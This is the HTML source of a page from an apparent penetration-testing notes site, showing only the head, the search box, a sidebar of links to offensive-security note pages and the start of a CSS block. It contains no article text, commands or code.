340 lines
46 KiB
HTML
340 lines
46 KiB
HTML
<!doctype html>
|
|
<html lang="en">
|
|
<center>
|
|
<head>
|
|
|
|
|
|
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
|
|
<!-- mathjax -->
|
|
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
|
|
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
|
|
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
|
|
<script type="text/javascript" src="/static/js/search.js"></script>
|
|
<link rel="stylesheet" href="/static/stylesheet.css">
|
|
<link rel="stylesheet" href="/static/auto-complete.css">
|
|
<br>
|
|
<title>In the Open</title>
|
|
<meta name="viewport" content="width=device-width, initial-scale=1">
|
|
|
|
|
|
</head>
|
|
<body>
|
|
<!-- topmenu -->
|
|
<div class="menu">
|
|
<a href="/" style="text-decoration:none">In the Open</a>
|
|
</div>
|
|
<div class="search-container">
|
|
<label for="search-by"><i class="fas fa-search"></i></label>
|
|
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
|
|
<!--button type="submit"><i class="search"></i>🔍</button>-->
|
|
<span data-search-clear=""><i class="fas fa-times"></i></span>
|
|
</div>
|
|
|
|
</div>
|
|
<div class="menu">
|
|
</div>
|
|
<!--br><br-->
|
|
</center>
|
|
<p></p>
|
|
<div class="columns">
|
|
<!-- Sidebar -->
|
|
<div class="column column-1">
|
|
<ul><details id=crypto ontoggle="linkClick(this); return false;" ><summary>Crypto</summary><ul><details id=openssl ontoggle="linkClick(this); return false;" ><summary>Openssl</summary><ul><li><a href="/crypto/openssl/openssl.html">openssl</a></li><li><a href="/crypto/openssl/openssl_engine.html">openssl_engine</a></li></ul></details><li><a href="/crypto/rsa.html">rsa</a></li></ul></details><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exfiltration ontoggle="linkClick(this); return false;" ><summary>Exfiltration</summary><ul><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exfiltration/dns/dns.html">dns</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exfiltration/linux/nc.html">nc</a></li><li><a href="/exfiltration/linux/wget.html">wget</a></li></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/exfiltration/windows/evil-winrm.html">evil-winrm</a></li><li><a href="/exfiltration/windows/loot.html">loot</a></li><li><a href="/exfiltration/windows/smb_connection.html">smb_connection</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs/meltdown.html">meltdown</a></li></ul></details><details id=binaries ontoggle="linkClick(this); return false;" ><summary>Binaries</summary><ul><li><a href="/exploit/binaries/aslr.html">aslr</a></li><details id=buffer_overflow ontoggle="linkClick(this); return false;" ><summary>Buffer_overflow</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/binaries/buffer_overflow/docs/amd64.html">amd64</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/amd64_instructions.html">amd64_instructions</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/buffer_overflow.html">buffer_overflow</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html">cut_stack_in_half</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html">pwntools_specifics</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html">ret_address_reuse</a></li></ul></details><li><a href="/exploit/binaries/buffer_overflow/ropping.html">ropping</a></li></ul></details><details id=canary_bypass ontoggle="linkClick(this); return false;" ><summary>Canary_bypass</summary><ul><li><a href="/exploit/binaries/canary_bypass/canary_bypass.html">canary_bypass</a></li></ul></details><details id=format_string ontoggle="linkClick(this); return false;" ><summary>Format_string</summary><ul><li><a href="/exploit/binaries/format_string/format_string.html">format_string</a></li></ul></details><details id=integral_promotion ontoggle="linkClick(this); return false;" ><summary>Integral_promotion</summary><ul><li><a href="/exploit/binaries/integral_promotion/integral_promotion.html">integral_promotion</a></li></ul></details><li><a href="/exploit/binaries/plt_got.html">plt_got</a></li><li><a href="/exploit/binaries/r2.html">r2</a></li><li><a href="/exploit/binaries/ret2libc.html">ret2libc</a></li></ul></details><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exploit/dns/zone_transfer.html">zone_transfer</a></li></ul></details><details id=hashes ontoggle="linkClick(this); return false;" ><summary>Hashes</summary><ul><li><a href="/exploit/hashes/collision.html">collision</a></li></ul></details><details id=imagemagick ontoggle="linkClick(this); return false;" ><summary>Imagemagick</summary><ul><li><a href="/exploit/imagemagick/imagetragick.html">imagetragick</a></li></ul></details><details id=java ontoggle="linkClick(this); return false;" ><summary>Java</summary><ul><details id=OGNL ontoggle="linkClick(this); return false;" ><summary>OGNL</summary><ul><li><a href="/exploit/java/OGNL/cve_2022_26134.html">cve_2022_26134</a></li></ul></details><li><a href="/exploit/java/ghidra_debug.html">ghidra_debug</a></li><li><a href="/exploit/java/ghostcat.html">ghostcat</a></li><li><a href="/exploit/java/log4shell.html">log4shell</a></li><li><a href="/exploit/java/spring4shell.html">spring4shell</a></li></ul></details><details id=level3_hypervisor ontoggle="linkClick(this); return false;" ><summary>Level3_hypervisor</summary><ul><details id=docker_sec ontoggle="linkClick(this); return false;" ><summary>Docker_sec</summary><ul><li><a href="/exploit/level3_hypervisor/docker_sec/docker.html">docker</a></li></ul></details><li><a href="/exploit/level3_hypervisor/kubernetes.html">kubernetes</a></li><li><a href="/exploit/level3_hypervisor/lxc.html">lxc</a></li><li><a href="/exploit/level3_hypervisor/microk8s.html">microk8s</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exploit/linux/capabilities.html">capabilities</a></li><details id=dirty_pipe ontoggle="linkClick(this); return false;" ><summary>Dirty_pipe</summary><ul><li><a href="/exploit/linux/dirty_pipe/dirty_pipe.html">dirty_pipe</a></li></ul></details><li><a href="/exploit/linux/exiftool.html">exiftool</a></li><li><a href="/exploit/linux/groups.html">groups</a></li><li><a href="/exploit/linux/ld_preload.html">ld_preload</a></li><li><a href="/exploit/linux/nfs_rootsquash.html">nfs_rootsquash</a></li><li><a href="/exploit/linux/overlayfs.html">overlayfs</a></li><details id=pkexec ontoggle="linkClick(this); return false;" ><summary>Pkexec</summary><ul><li><a href="/exploit/linux/pkexec/CVE_2021_4034.html">CVE_2021_4034</a></li></ul></details><li><a href="/exploit/linux/polkit.html">polkit</a></li><li><a href="/exploit/linux/racing_conditions.html">racing_conditions</a></li><li><a href="/exploit/linux/setcap.html">setcap</a></li><li><a href="/exploit/linux/shared_object_injection.html">shared_object_injection</a></li><li><a href="/exploit/linux/shell_shock.html">shell_shock</a></li><details id=sudo ontoggle="linkClick(this); return false;" ><summary>Sudo</summary><ul><li><a href="/exploit/linux/sudo/CVE_2019_14287.html">CVE_2019_14287</a></li><li><a href="/exploit/linux/sudo/CVE_2019_18634.html">CVE_2019_18634</a></li><li><a href="/exploit/linux/sudo/baron_samedit.html">baron_samedit</a></li><li><a href="/exploit/linux/sudo/tokens.html">tokens</a></li></ul></details><li><a href="/exploit/linux/wildard_exploitation.html">wildard_exploitation</a></li></ul></details><details id=macOS ontoggle="linkClick(this); return false;" ><summary>MacOS</summary><ul></ul></details><details id=network ontoggle="linkClick(this); return false;" ><summary>Network</summary><ul><li><a href="/exploit/network/mac_spoofing.html">mac_spoofing</a></li></ul></details><details id=padding ontoggle="linkClick(this); return false;" ><summary>Padding</summary><ul><li><a href="/exploit/padding/padbuster.html">padbuster</a></li></ul></details><details id=python ontoggle="linkClick(this); return false;" ><summary>Python</summary><ul><li><a href="/exploit/python/code_injection.html">code_injection</a></li><li><a href="/exploit/python/jail_escape.html">jail_escape</a></li><li><a href="/exploit/python/lib_hijack.html">lib_hijack</a></li><li><a href="/exploit/python/pickle.html">pickle</a></li><li><a href="/exploit/python/pwntools.html">pwntools</a></li><li><a href="/exploit/python/pyc.html">pyc</a></li><li><a href="/exploit/python/scapy.html">scapy</a></li></ul></details><details id=samba ontoggle="linkClick(this); return false;" ><summary>Samba</summary><ul><li><a href="/exploit/samba/smbmap.html">smbmap</a></li></ul></details><details id=sqli ontoggle="linkClick(this); return false;" ><summary>Sqli</summary><ul><li><a href="/exploit/sqli/mssql.html">mssql</a></li><li><a href="/exploit/sqli/no_sqli.html">no_sqli</a></li><li><a href="/exploit/sqli/sqli.html">sqli</a></li><li><a href="/exploit/sqli/sqlmap.html">sqlmap</a></li></ul></details><details id=ssl_tls ontoggle="linkClick(this); return false;" ><summary>Ssl_tls</summary><ul><li><a href="/exploit/ssl_tls/heartbleed.html">heartbleed</a></li></ul></details><details id=web ontoggle="linkClick(this); return false;" ><summary>Web</summary><ul><details id=bypass_rate_limiting ontoggle="linkClick(this); return false;" ><summary>Bypass_rate_limiting</summary><ul><li><a href="/exploit/web/bypass_rate_limiting/bypass_rate_limiting.html">bypass_rate_limiting</a></li></ul></details><li><a href="/exploit/web/command_injection.html">command_injection</a></li><details id=content_security_policy ontoggle="linkClick(this); return false;" ><summary>Content_security_policy</summary><ul><li><a href="/exploit/web/content_security_policy/content_security_policy.html">content_security_policy</a></li></ul></details><li><a href="/exploit/web/cookie_tampering.html">cookie_tampering</a></li><li><a href="/exploit/web/csrf.html">csrf</a></li><details id=forced_browsing ontoggle="linkClick(this); return false;" ><summary>Forced_browsing</summary><ul><li><a href="/exploit/web/forced_browsing/forced_browsing.html">forced_browsing</a></li></ul></details><li><a href="/exploit/web/http_header_injection.html">http_header_injection</a></li><details id=idor ontoggle="linkClick(this); return false;" ><summary>Idor</summary><ul><li><a href="/exploit/web/idor/idor.html">idor</a></li></ul></details><details id=javascript ontoggle="linkClick(this); return false;" ><summary>Javascript</summary><ul><li><a href="/exploit/web/javascript/bypass_filters.html">bypass_filters</a></li><li><a href="/exploit/web/javascript/prototype_pollution.html">prototype_pollution</a></li></ul></details><details id=jwt ontoggle="linkClick(this); return false;" ><summary>Jwt</summary><ul><li><a href="/exploit/web/jwt/jwt.html">jwt</a></li></ul></details><li><a href="/exploit/web/local_file_inclusion.html">local_file_inclusion</a></li><li><a href="/exploit/web/methodology.html">methodology</a></li><details id=nodejs ontoggle="linkClick(this); return false;" ><summary>Nodejs</summary><ul><li><a href="/exploit/web/nodejs/deserialization.html">deserialization</a></li></ul></details><details id=php ontoggle="linkClick(this); return false;" ><summary>Php</summary><ul><li><a href="/exploit/web/php/command_injection.html">command_injection</a></li><li><a href="/exploit/web/php/password_reset.html">password_reset</a></li><li><a href="/exploit/web/php/php_base64_filter.html">php_base64_filter</a></li><li><a href="/exploit/web/php/php_image_exif.html">php_image_exif</a></li><li><a href="/exploit/web/php/php_user_agent_rce.html">php_user_agent_rce</a></li><li><a href="/exploit/web/php/preload_lib.html">preload_lib</a></li><li><a href="/exploit/web/php/unserialize.html">unserialize</a></li></ul></details><li><a href="/exploit/web/re_registration.html">re_registration</a></li><li><a href="/exploit/web/remote_file_inclusion.html">remote_file_inclusion</a></li><details id=ssrf ontoggle="linkClick(this); return false;" ><summary>Ssrf</summary><ul><li><a href="/exploit/web/ssrf/iframe.html">iframe</a></li><li><a href="/exploit/web/ssrf/ssrf.html">ssrf</a></li></ul></details><details id=ssti ontoggle="linkClick(this); return false;" ><summary>Ssti</summary><ul><li><a href="/exploit/web/ssti/ssti.html">ssti</a></li></ul></details><li><a href="/exploit/web/url_forgery.html">url_forgery</a></li><li><a href="/exploit/web/wordpress.html">wordpress</a></li><li><a href="/exploit/web/xpath.html">xpath</a></li><li><a href="/exploit/web/xss.html">xss</a></li><details id=xxe ontoggle="linkClick(this); return false;" ><summary>Xxe</summary><ul><li><a href="/exploit/web/xxe/wp_xxe_.html">wp_xxe_</a></li><li><a href="/exploit/web/xxe/xml_external_entity.html">xml_external_entity</a></li></ul></details></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><details id=dll_hijacking ontoggle="linkClick(this); return false;" ><summary>Dll_hijacking</summary><ul><li><a href="/exploit/windows/dll_hijacking/dll_hijacking.html">dll_hijacking</a></li></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/windows/docs/always_installed_elevated.html">always_installed_elevated</a></li><li><a href="/exploit/windows/docs/crackmapexec.html">crackmapexec</a></li><li><a href="/exploit/windows/docs/dpapi.html">dpapi</a></li><li><a href="/exploit/windows/docs/impacket.html">impacket</a></li><li><a href="/exploit/windows/docs/llmnr.html">llmnr</a></li><li><a href="/exploit/windows/docs/lnk_exploit.html">lnk_exploit</a></li><li><a href="/exploit/windows/docs/pass_the_hash.html">pass_the_hash</a></li><li><a href="/exploit/windows/docs/password_in_registry.html">password_in_registry</a></li><li><a href="/exploit/windows/docs/potatoes.html">potatoes</a></li><li><a href="/exploit/windows/docs/printnightmare.html">printnightmare</a></li><li><a href="/exploit/windows/docs/responder.html">responder</a></li><li><a href="/exploit/windows/docs/unquoted_path.html">unquoted_path</a></li></ul></details><details id=macros ontoggle="linkClick(this); return false;" ><summary>Macros</summary><ul><li><a href="/exploit/windows/macros/macros.html">macros</a></li></ul></details><details id=payloads ontoggle="linkClick(this); return false;" ><summary>Payloads</summary><ul><li><a href="/exploit/windows/payloads/windows_scripting_host.html">windows_scripting_host</a></li></ul></details><details id=print_nightmare ontoggle="linkClick(this); return false;" ><summary>Print_nightmare</summary><ul><details id=CVE-2021-1675 ontoggle="linkClick(this); return false;" ><summary>CVE-2021-1675</summary><ul><details id=nightmare-dll ontoggle="linkClick(this); return false;" ><summary>Nightmare-dll</summary><ul></ul></details></ul></details><li><a href="/exploit/windows/print_nightmare/print_nightmare.html">print_nightmare</a></li></ul></details><details id=process_injection ontoggle="linkClick(this); return false;" ><summary>Process_injection</summary><ul><li><a href="/exploit/windows/process_injection/dll_injection.html">dll_injection</a></li><li><a href="/exploit/windows/process_injection/process_hollowing.html">process_hollowing</a></li><li><a href="/exploit/windows/process_injection/shellcode_injection.html">shellcode_injection</a></li><li><a href="/exploit/windows/process_injection/thread_hijacking.html">thread_hijacking</a></li></ul></details><details id=service_escalation ontoggle="linkClick(this); return false;" ><summary>Service_escalation</summary><ul><li><a href="/exploit/windows/service_escalation/service_escalation.html">service_escalation</a></li></ul></details><details id=zero_logon ontoggle="linkClick(this); return false;" ><summary>Zero_logon</summary><ul><li><a href="/exploit/windows/zero_logon/zero_logon.html">zero_logon</a></li></ul></details></ul></details><details id=yaml ontoggle="linkClick(this); return false;" ><summary>Yaml</summary><ul><li><a href="/exploit/yaml/deserialization.html">deserialization</a></li></ul></details></ul></details><details id=forensics ontoggle="linkClick(this); return false;" ><summary>Forensics</summary><ul><li><a href="/forensics/ios.html">ios</a></li><li><a href="/forensics/kape.html">kape</a></li><li><a href="/forensics/ntfs.html">ntfs</a></li><li><a href="/forensics/oletools.html">oletools</a></li><li><a href="/forensics/volatility.html">volatility</a></li><li><a href="/forensics/windows_registry.html">windows_registry</a></li></ul></details><details id=hashes ontoggle="linkClick(this); return false;" ><summary>Hashes</summary><ul><details id=bruteforce ontoggle="linkClick(this); return false;" ><summary>Bruteforce</summary><ul></ul></details><li><a href="/hashes/generate_wordlists.html">generate_wordlists</a></li><li><a href="/hashes/haiti.html">haiti</a></li><li><a href="/hashes/hashcat_utils.html">hashcat_utils</a></li><details id=password_cracking ontoggle="linkClick(this); return false;" ><summary>Password_cracking</summary><ul><li><a href="/hashes/password_cracking/hydra.html">hydra</a></li><li><a href="/hashes/password_cracking/john.html">john</a></li><li><a href="/hashes/password_cracking/smb_challenge.html">smb_challenge</a></li><li><a href="/hashes/password_cracking/sucrack.html">sucrack</a></li><li><a href="/hashes/password_cracking/vnc.html">vnc</a></li></ul></details><details id=password_guessing ontoggle="linkClick(this); return false;" ><summary>Password_guessing</summary><ul><li><a href="/hashes/password_guessing/standard_passwords.html">standard_passwords</a></li></ul></details></ul></details><details id=misc ontoggle="linkClick(this); return false;" ><summary>Misc</summary><ul><details id=active_directory ontoggle="linkClick(this); return false;" ><summary>Active_directory</summary><ul><li><a href="/misc/active_directory/AD_CS.html">AD_CS</a></li><li><a href="/misc/active_directory/active_directory.html">active_directory</a></li><li><a href="/misc/active_directory/ad_enumeration.html">ad_enumeration</a></li><li><a href="/misc/active_directory/ad_misconfiguration.html">ad_misconfiguration</a></li><li><a href="/misc/active_directory/ad_persistence.html">ad_persistence</a></li><li><a href="/misc/active_directory/gaining_foothold_AD.html">gaining_foothold_AD</a></li><li><a href="/misc/active_directory/lateral_movement.html">lateral_movement</a></li></ul></details><li><a href="/misc/bash.html">bash</a></li><li><a href="/misc/clamav.html">clamav</a></li><li><a href="/misc/gitTools.html">gitTools</a></li><li><a href="/misc/hadoop.html">hadoop</a></li><li><a href="/misc/metasploit.html">metasploit</a></li><details id=printer_hacking ontoggle="linkClick(this); return false;" ><summary>Printer_hacking</summary><ul><li><a href="/misc/printer_hacking/preta.html">preta</a></li></ul></details><li><a href="/misc/responder.html">responder</a></li><li><a href="/misc/sandbox_evasion.html">sandbox_evasion</a></li><li><a href="/misc/smtp.html">smtp</a></li><li><a href="/misc/snort.html">snort</a></li><details id=telecommunications ontoggle="linkClick(this); return false;" ><summary>Telecommunications</summary><ul><details id=_sipvicious ontoggle="linkClick(this); return false;" ><summary>_sipvicious</summary><ul><details id=.github ontoggle="linkClick(this); return false;" ><summary>.github</summary><ul><details id=ISSUE_TEMPLATE ontoggle="linkClick(this); return false;" ><summary>ISSUE_TEMPLATE</summary><ul><li><a href="/misc/telecommunications/_sipvicious/.github/ISSUE_TEMPLATE/bug-report.html">bug-report</a></li><li><a href="/misc/telecommunications/_sipvicious/.github/ISSUE_TEMPLATE/custom.html">custom</a></li></ul></details></ul></details><details id=sipvicious ontoggle="linkClick(this); return false;" ><summary>Sipvicious</summary><ul></ul></details></ul></details><li><a href="/misc/telecommunications/sip_vicious.html">sip_vicious</a></li></ul></details><details id=threat_intelligence ontoggle="linkClick(this); return false;" ><summary>Threat_intelligence</summary><ul><li><a href="/misc/threat_intelligence/isac.html">isac</a></li><li><a href="/misc/threat_intelligence/loki.html">loki</a></li><li><a href="/misc/threat_intelligence/osquery.html">osquery</a></li><li><a href="/misc/threat_intelligence/pithus.html">pithus</a></li><li><a href="/misc/threat_intelligence/siem.html">siem</a></li><li><a href="/misc/threat_intelligence/splunk.html">splunk</a></li><li><a href="/misc/threat_intelligence/yara.html">yara</a></li></ul></details><details id=wifi ontoggle="linkClick(this); return false;" ><summary>Wifi</summary><ul><li><a href="/misc/wifi/airmon-ng.html">airmon-ng</a></li></ul></details></ul></details><details id=osint ontoggle="linkClick(this); return false;" ><summary>Osint</summary><ul><li><a href="/osint/recon_ng.html">recon_ng</a></li><details id=social_engineering ontoggle="linkClick(this); return false;" ><summary>Social_engineering</summary><ul><li><a href="/osint/social_engineering/gophish.html">gophish</a></li><li><a href="/osint/social_engineering/phishing_domain.html">phishing_domain</a></li></ul></details><li><a href="/osint/spiderfoot.html">spiderfoot</a></li><li><a href="/osint/theharvester.html">theharvester</a></li></ul></details><details id=persistence ontoggle="linkClick(this); return false;" ><summary>Persistence</summary><ul><li><a href="/persistence/bashrc.html">bashrc</a></li><li><a href="/persistence/crontab.html">crontab</a></li><li><a href="/persistence/meterpreter.html">meterpreter</a></li><li><a href="/persistence/persistence.html">persistence</a></li><li><a href="/persistence/wmi.html">wmi</a></li></ul></details><details id=post exploitation ontoggle="linkClick(this); return false;" ><summary>Post exploitation</summary><ul><details id=Seatbelt ontoggle="linkClick(this); return false;" ><summary>Seatbelt</summary><ul><details id=.github ontoggle="linkClick(this); return false;" ><summary>.github</summary><ul><details id=ISSUE_TEMPLATE ontoggle="linkClick(this); return false;" ><summary>ISSUE_TEMPLATE</summary><ul><li><a href="/post exploitation/Seatbelt/.github/ISSUE_TEMPLATE/bug_report.html">bug_report</a></li><li><a href="/post exploitation/Seatbelt/.github/ISSUE_TEMPLATE/feature_request.html">feature_request</a></li></ul></details></ul></details><li><a href="/post exploitation/Seatbelt/CHANGELOG.html">CHANGELOG</a></li><details id=Seatbelt ontoggle="linkClick(this); return false;" ><summary>Seatbelt</summary><ul><details id=Commands ontoggle="linkClick(this); return false;" ><summary>Commands</summary><ul><details id=Windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><details id=EventLogs ontoggle="linkClick(this); return false;" ><summary>EventLogs</summary><ul></ul></details></ul></details></ul></details><details id=Output ontoggle="linkClick(this); return false;" ><summary>Output</summary><ul></ul></details></ul></details></ul></details><details id=bc_security ontoggle="linkClick(this); return false;" ><summary>Bc_security</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/docs/c2.html">c2</a></li><li><a href="/post exploitation/docs/crackmapexec.html">crackmapexec</a></li><li><a href="/post exploitation/docs/empire.html">empire</a></li><li><a href="/post exploitation/docs/ids_ips_evation.html">ids_ips_evation</a></li><li><a href="/post exploitation/docs/linux.html">linux</a></li><li><a href="/post exploitation/docs/metasploit.html">metasploit</a></li><li><a href="/post exploitation/docs/mimikatz.html">mimikatz</a></li><li><a href="/post exploitation/docs/mitm.html">mitm</a></li><li><a href="/post exploitation/docs/nfs_root_squash.html">nfs_root_squash</a></li><li><a href="/post exploitation/docs/powershell.html">powershell</a></li><li><a href="/post exploitation/docs/secretsdump.html">secretsdump</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/post exploitation/docs/windows/antivirus_evasion.html">antivirus_evasion</a></li><li><a href="/post exploitation/docs/windows/applocker.html">applocker</a></li><li><a href="/post exploitation/docs/windows/evade_event_tracing.html">evade_event_tracing</a></li><li><a href="/post exploitation/docs/windows/living_off_the_land.html">living_off_the_land</a></li><li><a href="/post exploitation/docs/windows/pass_the_hash.html">pass_the_hash</a></li><li><a href="/post exploitation/docs/windows/powershell_logs.html">powershell_logs</a></li><li><a href="/post exploitation/docs/windows/registry.html">registry</a></li><li><a href="/post exploitation/docs/windows/sebackupprivilege.html">sebackupprivilege</a></li><li><a href="/post exploitation/docs/windows/user_account_control.html">user_account_control</a></li></ul></details></ul></details><li><a href="/post exploitation/pivoting.html">pivoting</a></li><details id=priv_esc ontoggle="linkClick(this); return false;" ><summary>Priv_esc</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/priv_esc/docs/linux_priv_esc.html">linux_priv_esc</a></li><li><a href="/post exploitation/priv_esc/docs/pspy.html">pspy</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/post exploitation/priv_esc/docs/windows/add_user.html">add_user</a></li><li><a href="/post exploitation/priv_esc/docs/windows/windows_priv_esc.html">windows_priv_esc</a></li></ul></details></ul></details><details id=kernel-exploits ontoggle="linkClick(this); return false;" ><summary>Kernel-exploits</summary><ul></ul></details><details id=privesc-scripts ontoggle="linkClick(this); return false;" ><summary>Privesc-scripts</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/priv_esc/privesc-scripts/docs/get_script_onto_target.html">get_script_onto_target</a></li></ul></details></ul></details><details id=suid ontoggle="linkClick(this); return false;" ><summary>Suid</summary><ul></ul></details></ul></details></ul></details><details id=reverse engineering ontoggle="linkClick(this); return false;" ><summary>Reverse engineering</summary><ul><details id=android ontoggle="linkClick(this); return false;" ><summary>Android</summary><ul><li><a href="/reverse engineering/android/misc.html">misc</a></li></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/reverse engineering/docs/deobfuscation.html">deobfuscation</a></li><li><a href="/reverse engineering/docs/dll_reversing.html">dll_reversing</a></li><li><a href="/reverse engineering/docs/firmware.html">firmware</a></li><li><a href="/reverse engineering/docs/function_mangling.html">function_mangling</a></li><li><a href="/reverse engineering/docs/scada.html">scada</a></li></ul></details><details id=java ontoggle="linkClick(this); return false;" ><summary>Java</summary><ul><li><a href="/reverse engineering/java/krakatau.html">krakatau</a></li></ul></details></ul></details><details id=reverse shells ontoggle="linkClick(this); return false;" ><summary>Reverse shells</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/reverse shells/docs/evil-winrm.html">evil-winrm</a></li><li><a href="/reverse shells/docs/msfconsole.html">msfconsole</a></li><li><a href="/reverse shells/docs/msfvenom.html">msfvenom</a></li><li><a href="/reverse shells/docs/netcat.html">netcat</a></li><li><a href="/reverse shells/docs/powershell.html">powershell</a></li><li><a href="/reverse shells/docs/shell_upgrade.html">shell_upgrade</a></li><li><a href="/reverse shells/docs/socat.html">socat</a></li><li><a href="/reverse shells/docs/webshell.html">webshell</a></li></ul></details><li><a href="/reverse shells/firewalls.html">firewalls</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul></ul></details></ul></details><details id=stego ontoggle="linkClick(this); return false;" ><summary>Stego</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/stego/docs/outguess.html">outguess</a></li><li><a href="/stego/docs/remnux.html">remnux</a></li><li><a href="/stego/docs/stegbrute.html">stegbrute</a></li><li><a href="/stego/docs/steghide.html">steghide</a></li><li><a href="/stego/docs/stegoveritas.html">stegoveritas</a></li><li><a href="/stego/docs/zsteg.html">zsteg</a></li></ul></details></ul></details>
|
|
</ul>
|
|
</div>
|
|
<div class="column column-2">
|
|
<span class="body">
|
|
<style>pre { line-height: 125%; }
|
|
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
.codehilite .hll { background-color: #2C3B41 }
|
|
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
|
|
.codehilite .err { color: #FF5370 } /* Error */
|
|
.codehilite .esc { color: #89DDFF } /* Escape */
|
|
.codehilite .g { color: #EEFFFF } /* Generic */
|
|
.codehilite .k { color: #BB80B3 } /* Keyword */
|
|
.codehilite .l { color: #C3E88D } /* Literal */
|
|
.codehilite .n { color: #EEFFFF } /* Name */
|
|
.codehilite .o { color: #89DDFF } /* Operator */
|
|
.codehilite .p { color: #89DDFF } /* Punctuation */
|
|
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
|
|
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
|
|
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
|
|
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
|
|
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
|
|
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
|
|
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
|
|
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
|
|
.codehilite .gr { color: #FF5370 } /* Generic.Error */
|
